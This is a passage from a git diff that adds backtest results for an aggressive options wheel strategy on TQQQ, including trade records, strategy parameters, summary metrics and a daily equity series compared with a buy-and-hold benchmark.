"spot": 29.610010147094727, + "premium": 0.9927918442803616, + "close_cost": 0.0, + "pnl": 93.29918442803616, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 30.2, + "spot": 31.23383331298828, + "premium": 1.1216158765653326, + "close_cost": 1.033833312988282, + "pnl": 5.788256357705061, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.36, + "spot": 32.73884201049805, + "premium": 0.7427742185642661, + "close_cost": 0.0, + "pnl": 68.2974218564266, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-31 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 30.77, + "spot": 28.451082229614258, + "premium": 0.8759655443304677, + "close_cost": 2.3189177703857418, + "pnl": -147.28522260552742, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-04-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 29.02, + "spot": 24.97538185119629, + "premium": 1.1985391574059925, + "close_cost": 0.12676682144129847, + "pnl": 101.1972335964694, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-04-04 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 25.47, + "spot": 20.402353286743164, + "premium": 1.2617950173549026, + "close_cost": 0.14710837543264432, + "pnl": 105.48866419222583, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-04-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 20.81, + "spot": 24.121355056762695, + "premium": 1.2512474271128369, + "close_cost": 3.3113550567626966, + "pnl": -209.000762964986, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-04-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.67, + "spot": 24.72215461730957, + "premium": 1.8845618356092615, + "close_cost": 0.8536548007825999, + "pnl": 97.11070348266615, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-04-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 19.54, + "spot": 23.858190536499023, + "premium": 1.656203135984132, + "close_cost": 0.5767811720737219, + "pnl": 101.962196391041, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2025-05-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.12, + "spot": 28.18792152404785, + "premium": 2.1781555533973744, + "close_cost": 1.056206295162876, + "pnl": 106.21492582344985, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-05-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.26, + "spot": 29.34979820251465, + "premium": 1.9102974940310684, + "close_cost": 0.4027426114272039, + "pnl": 144.77548826038645, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-05-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.71, + "spot": 35.223731994628906, + "premium": 0.47503503039711603, + "close_cost": 0.0005443672158748775, + "pnl": 41.46906631812412, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-06-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.69, + "spot": 35.55640411376953, + "premium": 0.4981695232149672, + "close_cost": 0.0313431195718612, + "pnl": 40.7026403643106, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 48.35, + "spot": 53.771759033203125, + "premium": 0.5454113173171304, + "close_cost": 0.007119044376069639, + "pnl": 47.849227294106086, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-10-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 49.0, + "spot": 53.437835693359375, + "premium": 0.5796126730757098, + "close_cost": 0.27775326332082884, + "pnl": 24.2059409754881, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-11-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 53.92, + "spot": 58.97001266479492, + "premium": 0.831086071889608, + "close_cost": 0.1181627822701854, + "pnl": 65.31232896194226, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-11-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 50.08, + "spot": 56.17401885986328, + "premium": 0.9419557282829452, + "close_cost": 0.023740456761812245, + "pnl": 85.84152715211329, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-11-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 49.03, + "spot": 49.864349365234375, + "premium": 0.7034804707833988, + "close_cost": 0.348952202481426, + "pnl": 29.47282683019728, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-11-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 43.52, + "spot": 50.91596221923828, + "premium": 0.7094039265346268, + "close_cost": 0.01077869047244212, + "pnl": 63.88252360621847, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 51.1, + "spot": 55.12240982055664, + "premium": 0.8885551408676484, + "close_cost": 0.22771827157727653, + "pnl": 60.10368692903718, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 52.61, + "spot": 55.83012771606445, + "premium": 0.701964653397182, + "close_cost": 0.19307191753726727, + "pnl": 44.90927358599147, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.29, + "spot": 51.34457778930664, + "premium": 0.534425402068404, + "close_cost": 0.18149583547824566, + "pnl": 29.312956659015843, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2026-02-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.48, + "spot": 51.654598236083984, + "premium": 0.5631882299256947, + "close_cost": 0.1361951854446426, + "pnl": 36.719304448105206, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-02-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.49, + "spot": 48.27019119262695, + "premium": 0.5999675089350074, + "close_cost": 0.2202825599062539, + "pnl": 31.98849490287535, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-02-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.72, + "spot": 51.78438186645508, + "premium": 0.5420435636602114, + "close_cost": 0.1837399581888901, + "pnl": 29.85036054713213, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2026-03-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.14, + "spot": 50.17703628540039, + "premium": 0.5493659811993652, + "close_cost": 0.16897163249998126, + "pnl": 32.059434869938386, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2026-03-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.43, + "spot": 44.496429443359375, + "premium": 0.4571711027535077, + "close_cost": 0.07888536647136046, + "pnl": 31.848573628214726, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-03-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.45, + "spot": 41.68000030517578, + "premium": 0.48991036486796524, + "close_cost": 0.03275982095699792, + "pnl": 39.735054391096725, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-04-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.45, + "spot": 48.0, + "premium": 0.7825883684419921, + "close_cost": 0.1273844671440969, + "pnl": 59.540390129789515, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2026-04-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.62, + "spot": 53.40999984741211, + "premium": 1.0000270235383724, + "close_cost": 0.3787688574986454, + "pnl": 56.14581660397269, + "hold_days": 1, + "result": "Win" + } +] \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/drawdown.png b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/drawdown.png new file mode 100644 index 0000000..d4e9f07 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/drawdown.png differ diff --git a/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/equity.png b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/equity.png new file mode 100644 index 0000000..75bbb47 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/equity.png differ diff --git a/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/indicators.png b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/indicators.png new file mode 100644 index 0000000..8c611fe Binary files /dev/null and b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/indicators.png differ diff --git a/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/monthly.png b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/monthly.png new file mode 100644 index 0000000..ffea1b2 Binary files /dev/null and b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/monthly.png differ diff --git a/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/meta.json b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/meta.json new file mode 100644 index 0000000..4f7d512 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/meta.json @@ -0,0 +1,15 @@ +{ + "start": "2025-04-24", + "end": "2026-04-24", + "style": "aggressive", + "underlying_ticker": "TQQQ", + "signal_ticker": "QQQ", + "put_otm_pct": 6.0, + "call_otm_pct": 2.0, + "put_tp_pct": 50.0, + "call_tp_pct": 80.0, + "put_sl_pct": null, + "call_sl_pct": null, + "engine_version": "wheel-v3-split", + "rule_version": "tqqq-wheel-manual-v1.1" +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/metrics.json b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/metrics.json new file mode 100644 index 0000000..39b1186 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/metrics.json @@ -0,0 +1,15 @@ +{ + "total_return": 13.682463255870015, + "final_value": 11368.246325587003, + "cagr": 13.73253788517028, + "sharpe": 2.857837373795672, + "max_dd": -2.073090936612936, + "n_trades": 36, + "wins": 34, + "losses": 2, + "win_rate": 94.44444444444444, + "avg_win": 27.45038810795333, + "avg_loss": -287.9317604510025, + "chain_quotes": 0, + "bs_quotes": 98 +} \ No newline at end of file diff --git a/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/series.json b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/series.json new file mode 100644 index 0000000..37dce99 --- /dev/null +++ b/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/series.json @@ -0,0 +1,6088 @@ +{ + "equity": [ + [ + "2025-04-24", + 9998.183037138344 + ], + [ + "2025-04-25", + 10014.37246810272 + ], + [ + "2025-04-28", + 10015.547191184949 + ], + [ + "2025-04-29", + 10016.72205206656 + ], + [ + "2025-04-30", + 10017.897050763715 + ], + [ + "2025-05-01", + 10019.07218729258 + ], + [ + "2025-05-02", + 10020.247461669325 + ], + [ + "2025-05-05", + 10021.42287391012 + ], + [ + "2025-05-06", + 10022.598424031135 + ], + [ + "2025-05-07", + 10023.774112048546 + ], + [ + "2025-05-08", + 10024.949937978527 + ], + [ + "2025-05-09", + 10026.125901837257 + ], + [ + "2025-05-12", + 10027.302003640914 + ], + [ + "2025-05-13", + 10028.478243405681 + ], + [ + "2025-05-14", + 10029.654621147742 + ], + [ + "2025-05-15", + 10030.831136883278 + ], + [ + "2025-05-16", + 10032.00779062848 + ], + [ + "2025-05-19", + 10033.184582399537 + ], + [ + "2025-05-20", + 10034.36151221264 + ], + [ + "2025-05-21", + 10035.53858008398 + ], + [ + "2025-05-22", + 10036.715786029752 + ], + [ + "2025-05-23", + 10037.893130066153 + ], + [ + "2025-05-27", + 10039.070612209383 + ], + [ + "2025-05-28", + 10040.248232475642 + ], + [ + "2025-05-29", + 10041.425990881131 + ], + [ + "2025-05-30", + 10042.603887442056 + ], + [ + "2025-06-02", + 10043.781922174621 + ], + [ + "2025-06-03", + 10044.960095095035 + ], + [ + "2025-06-04", + 10046.138406219508 + ], + [ + "2025-06-05", + 10047.316855564253 + ], + [ + "2025-06-06", + 10048.495443145483 + ], + [ + "2025-06-09", + 10049.674168979413 + ], + [ + "2025-06-10", + 10050.85303308226 + ], + [ + "2025-06-11", + 10052.032035470243 + ], + [ + "2025-06-12", + 10053.211176159588 + ], + [ + "2025-06-13", + 10054.390455166513 + ], + [ + "2025-06-16", + 10055.569872507245 + ], + [ + "2025-06-17", + 10053.759428198013 + ], + [ + "2025-06-18", + 10059.175368682305 + ], + [ + "2025-06-20", + 10065.540915866666 + ], + [ + "2025-06-23", + 10079.79294029134 + ], + [ + "2025-06-24", + 10080.975337437918 + ], + [ + "2025-06-25", + 10082.157873284074 + ], + [ + "2025-06-26", + 10083.340547846075 + ], + [ + "2025-06-27", + 10084.523361140195 + ], + [ + "2025-06-30", + 10085.706313182707 + ], + [ + "2025-07-01", + 10086.889403989888 + ], + [ + "2025-07-02", + 10088.072633578013 + ], + [ + "2025-07-03", + 10089.256001963364 + ], + [ + "2025-07-07", + 10090.439509162221 + ], + [ + "2025-07-08", + 10091.623155190868 + ], + [ + "2025-07-09", + 10092.80694006559 + ], + [ + "2025-07-10", + 10093.990863802674 + ], + [ + "2025-07-11", + 10095.174926418409 + ], + [ + "2025-07-14", + 10096.359127929087 + ], + [ + "2025-07-15", + 10097.543468351 + ], + [ + "2025-07-16", + 10098.727947700441 + ], + [ + "2025-07-17", + 10099.91256599371 + ], + [ + "2025-07-18", + 10101.097323247104 + ], + [ + "2025-07-21", + 10102.282219476925 + ], + [ + "2025-07-22", + 10103.467254699473 + ], + [ + "2025-07-23", + 10104.652428931055 + ], + [ + "2025-07-24", + 10105.837742187974 + ], + [ + "2025-07-25", + 10107.02319448654 + ], + [ + "2025-07-28", + 10108.208785843066 + ], + [ + "2025-07-29", + 10109.39451627386 + ], + [ + "2025-07-30", + 10110.580385795236 + ], + [ + "2025-07-31", + 10111.766394423512 + ], + [ + "2025-08-01", + 10109.962542175004 + ], + [ + "2025-08-04", + 10115.669939855245 + ], + [ + "2025-08-05", + 10116.856545507113 + ], + [ + "2025-08-06", + 10118.04329035223 + ], + [ + "2025-08-07", + 10119.230174406926 + ], + [ + "2025-08-08", + 10120.41719768753 + ], + [ + "2025-08-11", + 10118.614360210373 + ], + [ + "2025-08-12", + 10132.386906017597 + ], + [ + "2025-08-13", + 10133.57547263168 + ], + [ + "2025-08-14", + 10134.764178669042 + ], + [ + "2025-08-15", + 10135.953024146036 + ], + [ + "2025-08-18", + 10134.15200907902 + ], + [ + "2025-08-19", + 10090.226535030812 + ], + [ + "2025-08-20", + 10066.17370228457 + ], + [ + "2025-08-21", + 10045.116463994895 + ], + [ + "2025-08-22", + 10131.335717195234 + ], + [ + "2025-08-25", + 10157.481354630561 + ], + [ + "2025-08-26", + 10172.165345033121 + ], + [ + "2025-08-27", + 10177.592895134747 + ], + [ + "2025-08-28", + 10178.786764579241 + ], + [ + "2025-08-29", + 10179.980774069056 + ], + [ + "2025-09-02", + 10178.184923620616 + ], + [ + "2025-09-03", + 10189.935951004647 + ], + [ + "2025-09-04", + 10191.131268335435 + ], + [ + "2025-09-05", + 10192.326725881385 + ], + [ + "2025-09-08", + 10193.522323658945 + ], + [ + "2025-09-09", + 10191.728061684564 + ], + [ + "2025-09-10", + 10200.585611680786 + ], + [ + "2025-09-11", + 10205.93311866091 + ], + [ + "2025-09-12", + 10207.130312518875 + ], + [ + "2025-09-15", + 10208.327646812126 + ], + [ + "2025-09-16", + 10209.525121557135 + ], + [ + "2025-09-17", + 10210.72273677038 + ], + [ + "2025-09-18", + 10211.920492468336 + ], + [ + "2025-09-19", + 10213.118388667484 + ], + [ + "2025-09-22", + 10214.316425384306 + ], + [ + "2025-09-23", + 10215.514602635283 + ], + [ + "2025-09-24", + 10216.712920436903 + ], + [ + "2025-09-25", + 10214.921378805651 + ], + [ + "2025-09-26", + 10219.268606408477 + ], + [ + "2025-09-29", + 10220.467364568682 + ], + [ + "2025-09-30", + 10221.66626334767 + ], + [ + "2025-10-01", + 10222.865302761937 + ], + [ + "2025-10-02", + 10224.06448282798 + ], + [ + "2025-10-03", + 10225.263803562299 + ], + [ + "2025-10-06", + 10226.463264981394 + ], + [ + "2025-10-07", + 10227.662867101768 + ], + [ + "2025-10-08", + 10228.862609939926 + ], + [ + "2025-10-09", + 10230.062493512374 + ], + [ + "2025-10-10", + 10228.272517835621 + ], + [ + "2025-10-13", + 10263.679263988814 + ], + [ + "2025-10-14", + 10264.883231684085 + ], + [ + "2025-10-15", + 10266.08734060924 + ], + [ + "2025-10-16", + 10267.291590780842 + ], + [ + "2025-10-17", + 10265.505982215462 + ], + [ + "2025-10-20", + 10308.692359087403 + ], + [ + "2025-10-21", + 10309.9016069859 + ], + [ + "2025-10-22", + 10311.110996733669 + ], + [ + "2025-10-23", + 10312.320528347345 + ], + [ + "2025-10-24", + 10310.540201843573 + ], + [ + "2025-10-27", + 10365.336004028673 + ], + [ + "2025-10-28", + 10366.551896437088 + ], + [ + "2025-10-29", + 10367.767931474198 + ], + [ + "2025-10-30", + 10368.984109156734 + ], + [ + "2025-10-31", + 10367.210429501429 + ], + [ + "2025-11-03", + 10417.980718786346 + ], + [ + "2025-11-04", + 10419.202786615315 + ], + [ + "2025-11-05", + 10420.42499779738 + ], + [ + "2025-11-06", + 10421.647352349355 + ], + [ + "2025-11-07", + 10419.879850288058 + ], + [ + "2025-11-10", + 10474.91720326847 + ], + [ + "2025-11-11", + 10476.145949958522 + ], + [ + "2025-11-12", + 10477.374840785124 + ], + [ + "2025-11-13", + 10478.603875765184 + ], + [ + "2025-11-14", + 10476.843054915611 + ], + [ + "2025-11-17", + 10482.528979927987 + ], + [ + "2025-11-18", + 10428.100809482805 + ], + [ + "2025-11-19", + 10487.639945015013 + ], + [ + "2025-11-20", + 10270.221631850309 + ], + [ + "2025-11-21", + 10375.363687742785 + ], + [ + "2025-11-24", + 10556.61876109776 + ], + [ + "2025-11-25", + 10589.289714030921 + ], + [ + "2025-11-26", + 10610.617573793294 + ], + [ + "2025-11-28", + 10613.615488633915 + ], + [ + "2025-12-01", + 10645.397827171 + ], + [ + "2025-12-02", + 10679.220152026608 + ], + [ + "2025-12-03", + 10680.472864211297 + ], + [ + "2025-12-04", + 10681.725723343778 + ], + [ + "2025-12-05", + 10679.988729441287 + ], + [ + "2025-12-08", + 10709.330221437107 + ], + [ + "2025-12-09", + 10730.41016890404 + ], + [ + "2025-12-10", + 10731.668885867819 + ], + [ + "2025-12-11", + 10732.927750483774 + ], + [ + "2025-12-12", + 10731.196762769223 + ], + [ + "2025-12-15", + 10744.705337183661 + ], + [ + "2025-12-16", + 10761.248242444812 + ], + [ + "2025-12-17", + 10762.510576829145 + ], + [ + "2025-12-18", + 10763.77305928999 + ], + [ + "2025-12-19", + 10762.045689844716 + ], + [ + "2025-12-22", + 10794.205166491996 + ], + [ + "2025-12-23", + 10795.471366845917 + ], + [ + "2025-12-24", + 10796.737715729842 + ], + [ + "2025-12-26", + 10795.014213161194 + ], + [ + "2025-12-29", + 10804.164401300135 + ], + [ + "2025-12-30", + 10807.667485788987 + ], + [ + "2025-12-31", + 10788.503873678666 + ], + [ + "2026-01-02", + 10823.795058956655 + ], + [ + "2026-01-05", + 10845.280006895933 + ], + [ + "2026-01-06", + 10846.552198518317 + ], + [ + "2026-01-07", + 10847.824539373501 + ], + [ + "2026-01-08", + 10849.097029478995 + ], + [ + "2026-01-09", + 10847.379668852303 + ], + [ + "2026-01-12", + 10868.171307334116 + ], + [ + "2026-01-13", + 10869.446184191056 + ], + [ + "2026-01-14", + 10870.721210595786 + ], + [ + "2026-01-15", + 10871.996386565848 + ], + [ + "2026-01-16", + 10870.281712118787 + ], + [ + "2026-01-20", + 10799.826399514368 + ], + [ + "2026-01-21", + 10876.745653158241 + ], + [ + "2026-01-22", + 10885.674484774016 + ], + [ + "2026-01-23", + 10883.961414818672 + ], + [ + "2026-01-26", + 10901.547987485901 + ], + [ + "2026-01-27", + 10902.826779551378 + ], + [ + "2026-01-28", + 10904.105721623913 + ], + [ + "2026-01-29", + 10905.384813721103 + ], + [ + "2026-01-30", + 10903.674055860545 + ], + [ + "2026-02-02", + 10926.56294863389 + ], + [ + "2026-02-03", + 10927.84467504721 + ], + [ + "2026-02-04", + 10929.1265518118 + ], + [ + "2026-02-05", + 10930.408578945295 + ], + [ + "2026-02-06", + 10928.700756465334 + ], + [ + "2026-02-09", + 10969.698644506652 + ], + [ + "2026-02-10", + 10970.985430897297 + ], + [ + "2026-02-11", + 10972.272368232765 + ], + [ + "2026-02-12", + 10973.559456530762 + ], + [ + "2026-02-13", + 10971.856695808996 + ], + [ + "2026-02-17", + 11008.129268091647 + ], + [ + "2026-02-18", + 11009.420562537163 + ], + [ + "2026-02-19", + 11010.712008456314 + ], + [ + "2026-02-20", + 11009.013605866865 + ], + [ + "2026-02-23", + 10991.531616759394 + ], + [ + "2026-02-24", + 11036.215951897773 + ], + [ + "2026-02-25", + 11037.51054101561 + ], + [ + "2026-02-26", + 11038.805281993558 + ], + [ + "2026-02-27", + 11037.110174849431 + ], + [ + "2026-03-02", + 11068.9914194212 + ], + [ + "2026-03-03", + 11070.2898532231 + ], + [ + "2026-03-04", + 11071.588439336107 + ], + [ + "2026-03-05", + 11072.887177778088 + ], + [ + "2026-03-06", + 11071.196068566911 + ], + [ + "2026-03-09", + 11113.706920100261 + ], + [ + "2026-03-10", + 11115.010599196457 + ], + [ + "2026-03-11", + 11116.314431219052 + ], + [ + "2026-03-12", + 11117.618416185986 + ], + [ + "2026-03-13", + 11115.9325541152 + ], + [ + "2026-03-16", + 11145.298379904507 + ], + [ + "2026-03-17", + 11146.605764796263 + ], + [ + "2026-03-18", + 11147.913303049121 + ], + [ + "2026-03-19", + 11149.220994681073 + ], + [ + "2026-03-20", + 11147.53883971011 + ], + [ + "2026-03-23", + 11183.690423831158 + ], + [ + "2026-03-24", + 11185.002312252249 + ], + [ + "2026-03-25", + 11186.314354562723 + ], + [ + "2026-03-26", + 11187.626550780633 + ], + [ + "2026-03-27", + 11185.948900924033 + ], + [ + "2026-03-30", + 11191.843786115982 + ], + [ + "2026-03-31", + 11231.309910268445 + ], + [ + "2026-04-01", + 11232.627384632146 + ], + [ + "2026-04-02", + 11233.945013540482 + ], + [ + "2026-04-06", + 11232.272797011581 + ], + [ + "2026-04-07", + 11249.561677793834 + ], + [ + "2026-04-08", + 11297.456877508299 + ], + [ + "2026-04-09", + 11298.782111156916 + ], + [ + "2026-04-10", + 11300.107500260361 + ], + [ + "2026-04-13", + 11298.443044836871 + ], + [ + "2026-04-14", + 11358.915941458929 + ], + [ + "2026-04-15", + 11360.248384483995 + ], + [ + "2026-04-16", + 11361.580983809577 + ], + [ + "2026-04-17", + 11362.913739454008 + ], + [ + "2026-04-20", + 11364.246651435627 + ], + [ + "2026-04-21", + 11365.579719772772 + ], + [ + "2026-04-22", + 11366.912944483782 + ], + [ + "2026-04-23", + 11368.246325587003 + ] + ], + "benchmark_bh": [ + [ + "2025-04-24", + 10000.0 + ], + [ + "2025-04-25", + 10111.479686660843 + ], + [ + "2025-04-28", + 10108.26978767883 + ], + [ + "2025-04-29", + 10175.02938743881 + ], + [ + "2025-04-30", + 10173.744640462772 + ], + [ + "2025-05-01", + 10306.621466494711 + ], + [ + "2025-05-02", + 10459.612653379794 + ], + [ + "2025-05-05", + 10397.560293050916 + ], + [ + "2025-05-06", + 10300.845354324096 + ], + [ + "2025-05-07", + 10341.285357198045 + ], + [ + "2025-05-08", + 10448.058460580478 + ], + [ + "2025-05-09", + 10441.210194906876 + ], + [ + "2025-05-12", + 10866.588737598304 + ], + [ + "2025-05-13", + 11032.203646174908 + ], + [ + "2025-05-14", + 11098.318903988786 + ], + [ + "2025-05-15", + 11110.518094886897 + ], + [ + "2025-05-16", + 11158.87523617396 + ], + [ + "2025-05-19", + 11169.573149706815 + ], + [ + "2025-05-20", + 11132.343045814878 + ], + [ + "2025-05-21", + 10977.639300396873 + ], + [ + "2025-05-22", + 10998.1814728069 + ], + [ + "2025-05-23", + 10896.330170786705 + ], + [ + "2025-05-27", + 11152.66803168299 + ], + [ + "2025-05-28", + 11103.241361503719 + ], + [ + "2025-05-29", + 11125.067624737088 + ], + [ + "2025-05-30", + 11107.519477072548 + ], + [ + "2025-06-02", + 11195.25102925752 + ], + [ + "2025-06-03", + 11282.763426442494 + ], + [ + "2025-06-04", + 11314.21807431651 + ], + [ + "2025-06-05", + 11229.057328389004 + ], + [ + "2025-06-06", + 11338.82511266962 + ], + [ + "2025-06-09", + 11355.515012609614 + ], + [ + "2025-06-10", + 11430.620874644981 + ], + [ + "2025-06-11", + 11392.104711471617 + ], + [ + "2025-06-12", + 11418.849495303752 + ], + [ + "2025-06-13", + 11275.490629975482 + ], + [ + "2025-06-16", + 11432.329496261735 + ], + [ + "2025-06-17", + 11320.851778058975 + ], + [ + "2025-06-18", + 11318.925313747613 + ], + [ + "2025-06-20", + 11272.707230244965 + ], + [ + "2025-06-23", + 11388.61922835787 + ], + [ + "2025-06-24", + 11562.77396425477 + ], + [ + "2025-06-25", + 11592.333643146763 + ], + [ + "2025-06-26", + 11700.726131379486 + ], + [ + "2025-06-27", + 11740.784253385174 + ], + [ + "2025-06-30", + 11816.829726079215 + ], + [ + "2025-07-01", + 11717.220497816488 + ], + [ + "2025-07-02", + 11798.835394582344 + ], + [ + "2025-07-03", + 11914.938989282075 + ], + [ + "2025-07-07", + 11825.185174492326 + ], + [ + "2025-07-08", + 11831.826752067127 + ], + [ + "2025-07-09", + 11915.582018922787 + ], + [ + "2025-07-10", + 11898.445935150461 + ], + [ + "2025-07-11", + 11871.667031378207 + ], + [ + "2025-07-14", + 11914.725083503632 + ], + [ + "2025-07-15", + 11925.64871356343 + ], + [ + "2025-07-16", + 11937.859715210046 + ], + [ + "2025-07-17", + 12034.469013353035 + ], + [ + "2025-07-18", + 12022.902353652524 + ], + [ + "2025-07-21", + 12085.23817194547 + ], + [ + "2025-07-22", + 12022.688447874081 + ], + [ + "2025-07-23", + 12077.525753173073 + ], + [ + "2025-07-24", + 12103.232503442341 + ], + [ + "2025-07-25", + 12132.365683082842 + ], + [ + "2025-07-28", + 12170.279498082558 + ], + [ + "2025-07-29", + 12151.42954347192 + ], + [ + "2025-07-30", + 12167.71131643587 + ], + [ + "2025-07-31", + 12103.232503442341 + ], + [ + "2025-08-01", + 11864.812860330354 + ], + [ + "2025-08-04", + 12083.7382068856 + ], + [ + "2025-08-05", + 12001.694186257473 + ], + [ + "2025-08-06", + 12152.715602753347 + ], + [ + "2025-08-07", + 12193.843253651245 + ], + [ + "2025-08-08", + 12307.58994787195 + ], + [ + "2025-08-11", + 12271.173473321323 + ], + [ + "2025-08-12", + 12425.40741340999 + ], + [ + "2025-08-13", + 12431.619867122517 + ], + [ + "2025-08-14", + 12421.980984038757 + ], + [ + "2025-08-15", + 12367.356272212819 + ], + [ + "2025-08-18", + 12362.42856547633 + ], + [ + "2025-08-19", + 12194.701501375788 + ], + [ + "2025-08-20", + 12122.29767613681 + ], + [ + "2025-08-21", + 12066.172999251 + ], + [ + "2025-08-22", + 12252.323518710686 + ], + [ + "2025-08-25", + 12216.977885357657 + ], + [ + "2025-08-26", + 12266.03317311178 + ], + [ + "2025-08-27", + 12284.884440027809 + ], + [ + "2025-08-28", + 12361.786848141004 + ], + [ + "2025-08-29", + 12218.693068501358 + ], + [ + "2025-09-02", + 12116.299128202721 + ], + [ + "2025-09-03", + 12211.624991675062 + ], + [ + "2025-09-04", + 12322.156537692199 + ], + [ + "2025-09-05", + 12339.93565110524 + ], + [ + "2025-09-08", + 12400.129787002994 + ], + [ + "2025-09-09", + 12435.26282688297 + ], + [ + "2025-09-10", + 12439.332285894916 + ], + [ + "2025-09-11", + 12511.734798828506 + ], + [ + "2025-09-12", + 12567.001227989767 + ], + [ + "2025-09-15", + 12674.536780803335 + ], + [ + "2025-09-16", + 12663.827056521977 + ], + [ + "2025-09-17", + 12638.549430114981 + ], + [ + "2025-09-18", + 12752.510030114128 + ], + [ + "2025-09-19", + 12838.837415532644 + ], + [ + "2025-09-22", + 12914.843519065009 + ], + [ + "2025-09-23", + 12829.059428077628 + ], + [ + "2025-09-24", + 12784.02241942527 + ], + [ + "2025-09-25", + 12728.906905383767 + ], + [ + "2025-09-26", + 12781.233770473194 + ], + [ + "2025-09-29", + 12840.42530505359 + ], + [ + "2025-09-30", + 12875.597714095242 + ], + [ + "2025-10-01", + 12937.361367238493 + ], + [ + "2025-10-02", + 12990.547792357855 + ], + [ + "2025-10-03", + 12935.861402178623 + ], + [ + "2025-10-06", + 13033.011370141969 + ], + [ + "2025-10-07", + 12964.38435981314 + ], + [ + "2025-10-08", + 13113.006882057538 + ], + [ + "2025-10-09", + 13097.135860680411 + ], + [ + "2025-10-10", + 12642.47847245028 + ], + [ + "2025-10-13", + 12910.768810831507 + ], + [ + "2025-10-14", + 12824.769501760293 + ], + [ + "2025-10-15", + 12915.271330621892 + ], + [ + "2025-10-16", + 12867.44698532285 + ], + [ + "2025-10-17", + 12951.945017028804 + ], + [ + "2025-10-20", + 13115.148564452731 + ], + [ + "2025-10-21", + 13111.71951047072 + ], + [ + "2025-10-22", + 